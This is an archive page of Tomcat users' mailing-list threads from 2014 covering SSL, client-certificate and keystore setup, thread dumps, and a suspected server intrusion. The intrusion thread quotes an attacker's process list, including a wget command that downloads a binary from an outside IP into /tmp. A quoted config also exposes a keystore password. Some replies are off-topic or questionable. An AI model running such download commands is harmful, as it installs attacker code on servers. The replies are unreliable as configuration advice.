RE: Regarding i think an intrusion

[Martin Gainty]

 Subject: Re: Regarding i think an intrusion
 From: lsantagost...@gmail.com
 To: users@tomcat.apache.org
 
 Hello Chris, but this logfile was only one day.
MGAy Caramba!
 
 Maybe i had a concept mismatch trying to capture the exact moment when the
 execution begins.
 
 My command was
 
 while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v
 127.0.0.1 | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea | grep
 java | grep -v grep | awk '{ print $2 }'); echo -e Se encontro wget
 corriendo, sacando dump de JVM... ; kill -3 $PIDJAVA; fi; sleep 3; done
 
 Maybe too many dumps all togheter, now im trying to get a live capture
 without luck =(
 
 If you know a better method, please letme know it.
 
 Thanks for your effort, knid regards,
 Leonardo
 
 Saludos.-
 Leonardo Santagostini
MGTomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita utilizar JDK 
@ 1.7 (ahora)
MGesto
ContainerBackgroundProcessor[StandardEngine[Catalina]] daemon prio=10 
tid=0x52867800 nid=0x2550 waiting on condition [0x4105e000]
   java.lang.Thread.State: TIMED_WAITING (sleeping)
 at java.lang.Thread.sleep(Native Method)
 at 
org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
 at java.lang.Thread.run(Thread.java:662)
MGEstos registros informativos producen MUCHO ruido
MGlog4j.properties
MGlog4j.logger.org.quartz=OFF  //(Callate Quartz)

MGeso
ajp-bio-8009-exec-37 daemon prio=10 tid=0x2aaac07fd800 nid=0x2656 
runnable [0x46f34000]
   java.lang.Thread.State: RUNNABLE
 at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
 at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at 

RE: Configuration of auth-constraint ?

[Martin Gainty]

 Date: Sun, 4 May 2014 12:42:04 +0530
 Subject: Configuration of auth-constraint ?
 From: motgu...@gmail.com
 To: users@tomcat.apache.org
 
 I am using client certificates in my application. Here is the configuration
 i did
 
 Step1:-
 
 Added below snippet in tomcat-users.xml file
 
 role rolename=certrole/
 user username=ignoreAndCheckInWebApp password=nopass
 roles=certrole/
 
 
 Step 2:-
 Added below sniipet in web.xml
 
  security-constraint
 web-resource-collection
   web-resource-nameClient Certificate Auth/web-resource-name
   url-pattern/MyClientAuthenticator.jsp/url-pattern
 /web-resource-collection
 auth-constraint
   role-namecertrole/role-name
 /auth-constraint
   /security-constraint
   login-config
 auth-methodCLIENT-CERT/auth-method
   /login-config
 
 placed a jar file conatining MySSlAuthentication.java into the lib folder
 of Tomcat.
 
 
 Step3:-
 Then added below valve element under tomcat\conf\context.xml
 
  Valve className=MySSlAuthentication/
 
 
 So its more or less th eprocedure mentioned at
 http://twoguysarguing.wordpress.com/2009/11/03/mutual-authentication-with-client-cert-tomcat-6-and-httpclient/
 
 
 My understanding when browser  tries to call the MyClientAuthenticator.jsp,
 server asks the client certificate from browser. But why do we need two
 entries
 * role rolename=certrole/ *
 *user username=ignoreAndCheckInWebApp password=nopass
 roles=certrole/ *under tomcat-users.xml and what is the use of  below
 entry ?
 
 *auth-constraint*
 *  role-namecertrole/role-name*
 * /auth-constraint*

MG for the URL presented at /MyClientAuthenticator.jsp
   url-pattern/MyClientAuthenticator.jsp/url-pattern
 /web-resource-collection
 auth-constraint

MGThe role from tomcat-users.xml defined as 'certrole'
   role-namecertrole/role-name
 /auth-constraint
   /security-constraint
   login-config

MGwould be authenticated (based on the contents of  the presented Client Cert)
 auth-methodCLIENT-CERT/auth-method
   /login-config

MGMakes Sense?
  

RE: Tomcat7 Client Certicate Authentication Using Datasource Realm Fails

[Martin Gainty]

 Date: Sat, 3 May 2014 19:31:17 -0400
 Subject: Tomcat7 Client Certicate Authentication Using Datasource Realm Fails
 From: dhayamoorthi2...@gmail.com
 To: users@tomcat.apache.org
 
 Hi,
 
 In Tomcat7, we are trying to do client certificate authentication using
 datasource realm. But it fails.
 
 Please fnd the configuration below:
 
 server.xml:
 
 ?xml version=1.0 encoding=UTF-8 standalone=no ?
 Server port=8005 shutdown=SHUTDOWNListener SSLEngine=on
 className=org.apache.catalina.core.AprLifecycleListener/
 Listener className=org.apache.catalina.core.JasperListener/
 Listener
 className=org.apache.catalina.core.JreMemoryLeakPreventionListener/
 Listener
 className=org.apache.catalina.mbeans.GlobalResourcesLifecycleListener/
 Listener
 className=org.apache.catalina.core.ThreadLocalLeakPreventionListener/
 !-- GlobalNamingResourcesResource auth=Container description=User
 database that can be updated and saved
 factory=org.apache.catalina.users.MemoryUserDatabaseFactory
 name=UserDatabase pathname=conf/tomcat-users.xml
 type=org.apache.catalina.UserDatabase/
 /GlobalNamingResources --
 Service name=Catalina
 Connector SSLEnabled=true clientAuth=true connectionTimeout=1
 keyAlias=masfed_server_dit
 keystoreFile=/opt/ADP/keystores/masfed_server_dit.jks keystorePass=sso@di
 maxThreads=150 port=8443
 protocol=org.apache.coyote.http11.Http11Protocol scheme=https
 secure=true server=Server sslProtocol=TLS
 truststorefile=/opt/ADP/keystores/masfed_server_dit.jks
  truststorepass=sso@di enablelookups=false/
 Connector port=8009 protocol=AJP/1.3 redirectPort=8443/
 Engine defaultHost=localhost name=Catalina
 !-- Realm className=org.apache.catalina.realm.MemoryRealm
 resourceName=UserDatabase/ --
 !--
 Realm className=org.apache.catalina.realm.LockOutRealmRealm
 className=org.apache.catalina.realm.UserDatabaseRealm
 resourceName=UserDatabase/
 /Realm
 --
 GlobalNamingResources
 Realm className=org.apache.catalina.realm.DataSourceRealm
dataSourceName=jdbc/FederationDS
userTable=T_USER userNameCol=USERNAME userCredCol=PASSWORD
userRoleTable=T_USER_ROLES roleNameCol=ROLENAME debug=99
  allRolesMode=authOnly /
 /GlobalNamingResources
 
 Host appBase=webapps autoDeploy=true name=localhost
 unpackWARs=trueValve
 className=org.apache.catalina.valves.AccessLogValve directory=logs
 pattern=%h %l %u %t quot;%rquot; %s %b prefix=localhost_access_log.
 suffix=.txt/
 /Host
 /Engine
 /Service
 /Server
 
 
 security role configuration tomcat_base/conf/web.xml:
 -
 
 security-role
 role-namemasFedClient/role-name
  /security-role
security-constraint
web-resource-collection
  web-resource-nameall/web-resource-name
url-pattern/*/url-pattern
  /web-resource-collection
  auth-constraint
 role-namemasFedClient/role-name
   /auth-constraint
   user-data-constraint
  transport-guaranteeCONFIDENTIAL/transport-guarantee
  /user-data-constraint
  /security-constraint
  login-config
  auth-methodCLIENT-CERT/auth-method
 !--  realm-nametomcat-users/realm-name --
  realm-namejdbc/FederationDS/realm-name
  /login-config
 
 Database has all the required tables and columns.
 
 But authentication fails with the below mentioned error:
 
 FINE:  Checking validity for
 '$'
MGthis is an insane value..change it to something meaningful using [A-Z][O-9] 
characters
MGbesides which your user_name length is WAY beyond the 15 byte allocation for 
the table
create table T_USER
(
  user_name varchar(15) not null primary key,
  user_pass varchar(15) not null
);
MG

 May 03, 2014 7:16:29 PM org.apache.catalina.realm.RealmBase authenticate
 FINE:  Checking validity for 'CN=VeriSign Class 3 Extended Validation SSL
 SGC CA, OU=Terms of use at https://www.verisign.com/rpa (c)06, OU=VeriSign
 Trust Network, O=VeriSign, Inc., C=US'
 May 03, 2014 7:16:29 PM org.apache.catalina.realm.RealmBase authenticate
 FINE:  Checking validity for 'CN=VeriSign Class 3 Public Primary
 Certification Authority - G5, OU=(c) 2006 VeriSign, Inc. - For authorized
 use only, OU=VeriSign Trust Network, O=VeriSign, Inc., C=US'
 May 03, 2014 7:16:29 PM org.apache.catalina.realm.RealmBase getPrincipal
 FINE: Got user name from X509 certificate:
 $$
 May 03, 2014 7:16:29 PM org.apache.catalina.authenticator.AuthenticatorBase
 invoke
 FINE:  Failed authenticate() test
 
 For security purpose, I had mad the certificate cn name as $$.
MGcn is ROLE not the user_name
MGhttps://tomcat.apache.org/tomcat-7.0-doc/realm-howto.html

 The error message does not tell why the authentication is failing.
MGyes it does ..it cannot authenticate 
$$

 Do I need to enable additional 

RE: Reg: Issue in SSL Authentication in Tomcat after new client certificate has been created / added, Tomcat has to be started every time i add a new client certificate

[Martin Gainty]

Krishna

Let me check with the engineers who want to work for you for free




 From: karip...@teksystems.com
 To: users@tomcat.apache.org
 Date: Fri, 2 May 2014 04:55:18 -0400
 Subject: Reg: Issue in SSL Authentication in Tomcat after new client 
 certificate has been created / added, Tomcat has to be started every time i 
 add a new client certificate
 
 
 Hi,
 
 1. We are using Tomcat 7.0.39 in our application.
 2. We have implemented Two Way SSL authentication using java keytool
 3. Issue is, when we create a new client certificate and add it to Java 
 Keystore(.jks), we are unable to authenticate unless we restart the Tomcat.
 So, every time we add a new client certificate, we are restarting the Tomcat. 
 Is there any way to handle this scenario with out restarting the Tomcat.
 
 I have read the document thoroughly, but i didn't get any information 
 regarding this. Can you please help us on this.
 Thanks In advance.
 
 --
 Thanks  Regards,
 
 Krishna Chaitanya Aripaka | Consultant
 Cell: +91 92912 41123   | Work  : +91 40 30113024
 
 This electronic mail (including any attachments) may contain information that 
 is privileged, confidential, and/or otherwise protected from disclosure to 
 anyone other than its intended recipient(s). Any dissemination or use of this 
 electronic mail or its contents (including any attachments) by persons other 
 than the intended recipient(s) is strictly prohibited. If you have received 
 this message in error, please notify us immediately by reply e-mail so that 
 we may correct our internal records. Please then delete the original message 
 (including any attachments) in its entirety. Thank you.
 
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: BLOCKED threads

[Martin Gainty]

Managing Provider Tokens
Like the provider, the consumer must be responsible for managing the 
OAuth tokens. The necessary interface for managing the consumer tokens 
is OAuthConsumerTokenServices which are only accessible via factory method. 
Assuming that the consumer can leverage an active HTTP session, the default 
HttpSessionBasedTokenServices and HttpSessionBasedTokenServicesFactory should 
be adequate.

so it appears that Spring is looking for an implmentor for 
OAuthConsumerTokenServices either
HttpSessionBasedTokenServices OR
HttpSessionBasedTokenServicesFactory



http://spring-security-oauth.codehaus.org/oauth1.html#Managing_Provider_Tokens

Martin


 Date: Fri, 2 May 2014 15:22:01 -0700
 From: rallav...@gmail.com
 To: users@tomcat.apache.org
 Subject: BLOCKED threads
 
 All,
 
 Tomcat Version: 7.0.47
 JVM Version: 1.7.0_51-b13
 
 I see many blocked threads (90) in the thread dump. There are mainly two 
 monitors that block 69 threads.
 
 One of them is below. It appears that it is simply trying to log.
 --
 http-bio-28080-exec-396 daemon prio=10 tid=0x7fcbc814f000 
 nid=0x5804 runnable [0x7fcc2144d000]
 java.lang.Thread.State: RUNNABLE
  at java.lang.Throwable.getStackTraceElement(Native Method)
  at java.lang.Throwable.getOurStackTrace(Throwable.java:827)
  - locked 0x0007e1886340 (a java.util.NoSuchElementException)
  at java.lang.Throwable.printStackTrace(Throwable.java:656)
  - locked 0x0007e207a5a8 (a java.io.PrintWriter)
  at java.lang.Throwable.printStackTrace(Throwable.java:721)
  at 
 java.util.logging.SimpleFormatter.format(SimpleFormatter.java:157)
  - locked 0x0007008187e8 (a java.util.logging.SimpleFormatter)
  at java.util.logging.StreamHandler.publish(StreamHandler.java:196)
  - locked 0x0007008187b0 (a java.util.logging.ConsoleHandler)
  at 
 java.util.logging.ConsoleHandler.publish(ConsoleHandler.java:105)
  at java.util.logging.Logger.log(Logger.java:610)
  at java.util.logging.Logger.doLog(Logger.java:631)
  at java.util.logging.Logger.logp(Logger.java:831)
  at org.apache.juli.logging.DirectJDKLog.log(DirectJDKLog.java:185)
  at 
 org.apache.juli.logging.DirectJDKLog.error(DirectJDKLog.java:151)
  at 
 org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:260)
  at 
 org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:123)
  at 
 org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:502)
  at 
 org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:171)
  at 
 org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:100)
  at 
 org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:953)
  at 
 org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:118)
  at 
 org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:408)
  at 
 org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1041)
  at 
 org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:603)
  at 
 org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:310)
  - locked 0x0007e0ba5dd8 (a 
 org.apache.tomcat.util.net.SocketWrapper)
  at 
 java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)
  at 
 java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)
  at java.lang.Thread.run(Thread.java:744)
 
 --
 
 The second one has the lock on StandardClassLoader.
 
 --
 
 http-bio-28080-exec-605 daemon prio=10 tid=0x7fcbc82b8800 
 nid=0x77e6 runnable [0x7fcb919d6000]
 java.lang.Thread.State: RUNNABLE
  at java.lang.ClassLoader.findLoadedClass0(Native Method)
  at java.lang.ClassLoader.findLoadedClass(ClassLoader.java:1093)
  at java.lang.ClassLoader.loadClass(ClassLoader.java:407)
  - locked 0x000700810fc8 (a 
 org.apache.catalina.loader.StandardClassLoader)
  at java.lang.ClassLoader.loadClass(ClassLoader.java:358)
  at 
 java.util.ResourceBundle$Control.newBundle(ResourceBundle.java:2566)
  at java.util.ResourceBundle.loadBundle(ResourceBundle.java:1436)
  at java.util.ResourceBundle.findBundle(ResourceBundle.java:1400)
  at java.util.ResourceBundle.findBundle(ResourceBundle.java:1354)
  at java.util.ResourceBundle.findBundle(ResourceBundle.java:1354)
  at 

RE: OpenSSL and keytool misery

[Martin Gainty]

apparently the provided cert that came with your P12 is not a X509v3 cert

assuming $1 is the root name of the PEM file

openssl pkcs12 -in $1.p12 -out $1.pem -nodes -clcerts

vi $1.pem
and you should see something like:

/snip
Key Attributes
X509v3 Key Usage: nn
/snip

please verify
Martin 


 Subject: Re: OpenSSL and keytool misery
 From: dmik...@gopivotal.com
 Date: Thu, 1 May 2014 08:53:10 -0700
 To: users@tomcat.apache.org
 
 On May 1, 2014, at 7:56 AM, Christopher Schultz 
 ch...@christopherschultz.net wrote:
 
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA256
  
  All,
  
  I've been trying to convert an OpenSSL-generated key and certificate
  into a keystore for use with Tomcat. I had given up on this months ago
  and now I'm resuming my attempts.
  
  What I've done so far:
  
  1. Created an RSA private key using openssl
  2. Created a certificate request using openssl
  3. Obtained a signed certificate from a CA
  4. Attempted to combine my key and certificate into a PKCS12 file
  using openssl:
  
  $ openssl pkcs12 -export -in ${HOSTNAME}.crt \
   -inkey ${HOSTNAME}.key  ${HOSTNAME}.p12
  
  5. Import the PKCS12 store into a Java keystore using keytool:
  
  $ keytool -importkeystore -srckeystore ${HOSTNAME}.p12 \
   -destkeystore ${HOSTNAME}.jks -srcstoretype pkcs12
  
  This is what my keytool now says is in the store:
  
  $ keytool -list -keystore conf/${HOSTNAME}.jks
  Enter keystore password:
  
  Keystore type: JKS
  Keystore provider: SUN
  
  Your keystore contains 1 entry
  
  1, May 1, 2014, PrivateKeyEntry,
  Certificate fingerprint (MD5):
  EC:FE:0A:7F:12:3D:19:39:DD:82:7A:7D:F9:AE:18:9A
  
  I set the password for the Java keystore to changeit. Now, in Tomcat:
  
 Connector port=8443
protocol=org.apache.coyote.http11.Http11NioProtocol
keystoreFile=${catalina.base}/conf/${HOSTNAME}.jks
keystorePass=“changeit
 
 Have you tried setting keyAlias and keyPass?
 
 Dan
 
 URIEncoding=UTF-8
  sslProtocol=SSL
  SSLEnabled=true
  scheme=https
  secure=true
  /
  
  (Note that ${HOSTNAME}.jks has been expanded in my actual server.xml
  file.)
  
  Here's what happens when I launch Tomcat:
  
  org.apache.catalina.LifecycleException: Failed to initialize component
  [Connector[org.apache.coyote.http11.Http11NioProtocol-8443]]
 at
  org.apache.catalina.util.LifecycleBase.init(LifecycleBase.java:106)
 at
  org.apache.catalina.core.StandardService.initInternal(StandardService.java:5
  59)
 at
  org.apache.catalina.util.LifecycleBase.init(LifecycleBase.java:102)
 at
  org.apache.catalina.core.StandardServer.initInternal(StandardServer.java:813
  )
 at
  org.apache.catalina.util.LifecycleBase.init(LifecycleBase.java:102)
 at org.apache.catalina.startup.Catalina.load(Catalina.java:638)
 at org.apache.catalina.startup.Catalina.load(Catalina.java:663)
 at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
 at
  sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39
  )
 at
  sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl
  .java:25)
 at java.lang.reflect.Method.invoke(Method.java:597)
 at org.apache.catalina.startup.Bootstrap.load(Bootstrap.java:280)
 at org.apache.catalina.startup.Bootstrap.main(Bootstrap.java:454)
  Caused by: org.apache.catalina.LifecycleException: Protocol handler
  initialization failed
 at
  org.apache.catalina.connector.Connector.initInternal(Connector.java:980)
 at
  org.apache.catalina.util.LifecycleBase.init(LifecycleBase.java:102)
 ... 12 more
  
  
  Caused by: java.security.UnrecoverableKeyException: Cannot recover key
 at
  sun.security.provider.KeyProtector.recover(KeyProtector.java:311)
 at
  sun.security.provider.JavaKeyStore.engineGetKey(JavaKeyStore.java:121)
 at
  sun.security.provider.JavaKeyStore$JKS.engineGetKey(JavaKeyStore.java:38)
 at java.security.KeyStore.getKey(KeyStore.java:763)
 at
  com.sun.net.ssl.internal.ssl.SunX509KeyManagerImpl.init(SunX509KeyManagerImpl.java:113)
 at
  com.sun.net.ssl.internal.ssl.KeyManagerFactoryImpl$SunX509.engineInit(KeyMan
  agerFactoryImpl.java:48)
 at
  javax.net.ssl.KeyManagerFactory.init(KeyManagerFactory.java:239)
 at
  org.apache.tomcat.util.net.jsse.JSSESocketFactory.getKeyManagers(JSSESocketF
  actory.java:560)
 at
  org.apache.tomcat.util.net.jsse.JSSESocketFactory.getKeyManagers(JSSESocketF
  actory.java:489)
 at
  org.apache.tomcat.util.net.NioEndpoint.bind(NioEndpoint.java:493)
 at
  org.apache.tomcat.util.net.AbstractEndpoint.init(AbstractEndpoint.java:640)
 at
  org.apache.coyote.AbstractProtocol.init(AbstractProtocol.java:434)
 at
  org.apache.coyote.http11.AbstractHttp11JsseProtocol.init(AbstractHttp11JsseP
  rotocol.java:119)
 at
  

RE: Regarding i think an intrusion

[Martin Gainty]

 Date: Wed, 30 Apr 2014 12:35:52 -0300
 Subject: Re: Regarding i think an intrusion
 From: lsantagost...@gmail.com
 To: users@tomcat.apache.org
 
 Hello list,
 
 well my homework is done
 
 Here are the links:
 
 setenv.sh: http://pastebin.com/EN1mXDFi
 catalina.sh: http://pastebin.com/1vRVLbSm
 web.xml: http://pastebin.com/BqEfiXXm
 server.xml: http://pastebin.com/wfzE8bYU
 logging.properties: http://pastebin.com/Qurk8sLU
 catalina.properties: http://pastebin.com/jkfY1ZRQ
 tree + logsfiles: http://pastebin.com/j3tip4ij

MGPor favor, pegue el contenido de los siguientes archivos de registros en 
Pastebin y enviarnos link:

-rw-rw-r-- 1 tomcat tomcat  5.0K Apr 30 05:38 
localhost.2014-04-30.log-rw-rw-r-- 1 tomcat tomcat  5.4M Apr 30 12:19 
localhost_access_log.2014-04-30.txt
-rw-rw-r-- 1 tomcat tomcat 0 Apr 30 05:38 manager.2014-04-30.log
-rw-rw-r-- 1 tomcat tomcat  3.7M Apr 30 12:19 
PDI_access_log.2014-04-30.txt-rw-rw-r-- 1 tomcat tomcat   43M Apr 30 12:18 
portal-ht.log-rw-rw-r-- 1 tomcat tomcat  583K Apr 30 10:09 
portal-mh.log-rw-rw-r-- 1 tomcat tomcat   58M Apr 30 12:19 
portal-pdi.log-rw-rw-r-- 1 tomcat tomcat  3.5M Apr 30 12:18 portal-rt.log
-rw-rw-r-- 1 tomcat tomcat  3.6M Apr 30 12:18 probe.log
-rw-rw-r-- 1 tomcat tomcat  591K Apr 30 12:18 RT_access_log.2014-04-30.txt

MGSaludos Cordiales desde EEUU

 
 Note that logsfiles, are not the logfiles itsef but only a ls -lah (just
 for you to see the logsizes)
 
 A little more about the infraestructure i've mounted ill do some ascii art.
 
 
 internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk
 (3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7)
 
 
 Apache(2) is serving static content so haproxy(1) at the first level does
 http round robin balancing
 Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection)
 using mod_jk(3)
 Tomcat(5) are the main app server (the ones gets intruded) who uses
 tomcat(7) (solr service) using haproxy(6) using L4 connection.
 
 Versions:
 
 Apache: 2.2.17
 mod_jk: 1.2.31
 haproxy: 1.4.22
 Tomcat: 7.0.53
 Java: 1.6.0.41
 
 [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
 java version 1.6.0_41
 Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
 Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
 
 OS: CentOS 5.8 64 bit
 
 [root@arcbaappvrt05 tomcat]# uname -a
 Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21
 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
 [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
 CentOS release 5.8 (Final)
 [root@arcbaappvrt05 tomcat]#
 
 For now i havent see that the squid process whas launched so i couldnt do a
 dump
 
 Letme know if you need more information.
 
 BTW, pastebin links will work for one week.
 
 Kind regards, yours
 
 
 
 
 Saludos.-
 Leonardo Santagostini
 
 http://ar.linkedin.com/in/santagostini
 
 
 
 
 
 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com:
 
  Ok, i will do the following:
 
  1) thread dump of running tomcat instance
  2) Pastebin the running tomcat config
 
  I think at mid day will have all the info.
 
  Thanks all for replying me and all the responses.
 
  Regards, Leonardo
 
  Saludos.-
  Leonardo Santagostini
 
  http://ar.linkedin.com/in/santagostini
 
 
 
 
 
  2014-04-30 10:55 GMT-03:00 Christopher Schultz 
  ch...@christopherschultz.net:
 
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA256
 
  Konstantin,
 
  On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
   2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
   lsantagost...@gmail.com:
   Hello Dan,
  
   Nop, the attacker is executing locally the following
  
   tomcat8882 1  0 Apr27 ?00:00:00 sh /tmp/4.sh
   tomcat8893  8882  0 Apr27 ?00:00:00 wget
   http://218.199.102.59/.xy/squid32 -O /tmp/squid
  
   And the launch squid who tries to connect via ssh to varoius
   places.
  
   Right now its time to leave the office, but in a few hours i will
   paste in pastebin access logs, config files, wherever you tell
   me.
  
   This is my pstree
  
   [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
   ├─java─┬─sh───wget │  └─263*[{java}]
  
   sh launched by tomcat's java?
 
  Yes: please verify that it's the JVM running Tomcat, and not just any
  JVM process.
 
   Take a thread dump:
  
  https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
  
It shall show what is stacktrace in thread that launched external
   process.
 
  +1
 
  The only things that ship with Tomcat that call Process.exec() are the
  CGI servlet and SSI, both of which are disabled by default. So, either
  you have an insecure CGI/SSI configuration, your web application has a
  vulnerability, or you have deployed something like the Manager
  application and improperly-secured it.
 
  A classic example of such an intrusion might be that someone got a
  foothold elsewhere into your network, and the Manager web application
  is not properly 

RE: Setup Issue tomcat 6 SLES 11 SSL

[Martin Gainty]

 Date: Wed, 30 Apr 2014 14:01:11 -0500
 From: tere...@tmbsw.com
 To: users@tomcat.apache.org
 Subject: Re: Setup Issue tomcat 6 SLES 11 SSL
 
 On 4/30/2014 9:02 AM, Christopher Schultz wrote:
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA256
 
  Vincent,
 
  On 4/29/14, 4:24 PM, Vincent T. DiScipio wrote:
  I have setup tomcat 6 on SLES 11 and secured the instance with an
  external certificate if authority.  The following is occurring
  from the same machine using both IE and Firefox:
 
  http://servername.wooster.edu:8080works for both IE11 and
  Firefox 29 and displays the index.html
 
  https://servername.wooster.edu:8443  works for Firefox 29 and
  displays the index.html
 
  https://servername.wooster.edu:8443  does not work for IE11v
  displays This page can't be displayed
 
  I have changed the logging level to finest and do not see any
  errors in the catalina.out.
 
  Thoughts?  I have the same setup on another server and I believe
  the files and permission levels are set the same.
  What does your SSL configuration look like?
 
  You could also use either sslscan from the CLI or go to
  https://www.ssllabs.com/ssltest/ and use their online tool to examine
  the site from the outside.
 
  Perhaps you have a combination of protocols and ciphers that MSIE
  can't handle.
 
  - -chris
 
 
 If the option is available, you might also try disabling the IE 
 friendly error messages.  I'm not sure about IE 11, but it seems like 
 previous versions displayed an error message with a reddish background 
 if they were unable to authenticate a server with a given SSL 
 certificate.  Was a certificate authority bundle supplied with the SSL 
 certificate?  If so, is it installed and configured?  Were the SSL 
 certificates on the both servers issued by the same company?
 
 -Terence Bandoian
 
MGIE / Internet Options / Tools / Content / Certificates / Import
MGImport the provided certficate into CA Trusted Root

 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: CORS issue with Tomcat and Android Webview

[Martin Gainty]

 Date: Sat, 26 Apr 2014 11:43:05 +0530
 Subject: Re: CORS issue with Tomcat and Android Webview
 From: ankising...@gmail.com
 To: users@tomcat.apache.org
 
 On Sat, Apr 26, 2014 at 12:53 AM, Terence M. Bandoian 
 tere...@tmbsw.comwrote:
 
  On 4/24/2014 11:16 PM, Ankit Singhal wrote:
 
  Hi
 
  I did more research on this and figure out the issue.If you see the
  headers
  from Android and look into Origin Header.
 
  Origin: file://
 
  Tomcat CORS filter tries to validate the URI in Origin header and
  considers
  file:// as an invalid URI and returns back 403.
 
  I have applied accept-origin*/accept-origin params. So shouldn't CORS
  filter honor this ?
 
  I agree that Client also has the problem , but still server should also
  allow...
 
 
 
  Hi, Ankit-
 
